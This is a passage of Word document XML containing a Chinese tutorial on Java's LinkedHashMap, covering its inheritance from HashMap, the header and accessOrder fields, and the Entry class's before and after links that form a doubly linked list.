      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>继承了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>几个重要的成员变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="28" name="图片 2" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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2"/>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 The head of the doubly linked list.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2"/>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2"/>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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> Entry&lt;K, V&gt; header;                                     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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2"/>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 The iteration ordering method for this linked hash map: &lt;tt&gt;true&lt;/tt&gt;</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2"/>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 for access-order, &lt;tt&gt;false&lt;/tt&gt; for insertion-order.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2"/>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2"/>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 @serial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2"/>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2"/>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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> accessOrder;                                        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于父类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的成员变量这里就不讲了，可参考</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://boy00fly.iteye.com/blog/1139845</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的内部类定义，代码片段如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="27" name="图片 3" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>继承了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HashMap.Entry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3"/>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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> Entry&lt;K, V&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> HashMap.Entry&lt;K, V&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>新增的两个成员变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>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3"/>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Entry&lt;K, V&gt; before, after;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看得出来新增的这两个变量就是双向链表实现的关键！！分别指向当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的前一个、后一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就是指向双向链表的头部！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>accessOrder</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则按照</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LRU</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>算法迭代整个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
